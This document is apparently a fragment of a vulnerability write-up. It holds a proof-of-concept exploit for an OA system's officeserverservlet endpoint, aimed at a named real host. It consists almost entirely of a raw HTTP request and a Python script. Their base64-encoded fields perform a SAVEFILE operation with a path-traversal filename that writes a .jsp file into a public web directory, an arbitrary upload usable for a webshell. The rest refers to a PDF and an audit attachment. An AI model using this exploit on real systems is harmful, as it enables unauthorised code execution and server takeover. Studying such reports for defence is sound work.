depy

POC

POST /defaultroot/officeserverservlet HTTP/1.1
Host: oa.upcard.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+,application/;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LocLan=zh_CN; OASESSIONID=9C7FADE1E9C7CDEBEB639505AD8229C0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 253

DBSTEP V3.0     185             0               611             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
firstFilesize=dHJ1ZQ==
isDoc=dHJ1ZQ==
moduleType=aW5mb3JtYXRpb24=
FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3Rlc3QyLmpzcA==
isViewOld=MQ==
1111

import requests
import base64

url="http://oa.upcard.com.cn/defaultroot/officeserverservlet"
FileData=open('exp.txt').read()
Body="DBSTEP=REJTVEVQ\\r\\nOPTION=U0FWRUZJTEU=\\r\\nisDoc=dHJ1ZQ==\\r\\nmoduleType=aW5mb3JtYXRpb24=\\r\\nFILETYPE=Ly4uLy4uLy4uL3B1YmxpYy9lZGl0L3Rlc3QudHh0\\r\\nRECORDID=dHJ1ZQ==\\r\\nfirstFilesize=\\r\\nisViewOld=Mg==\\r\\n"
Header="DBSTEP V3.0     "+str(len(Body)).ljust(16,' ') +"0               "+str(len(FileData)).ljust(16,' ')
Response=requests.post(url,data=Header+Body+FileData)
print(Response.text)

篇幅过长,详情请看pdf

审计附件

审计附件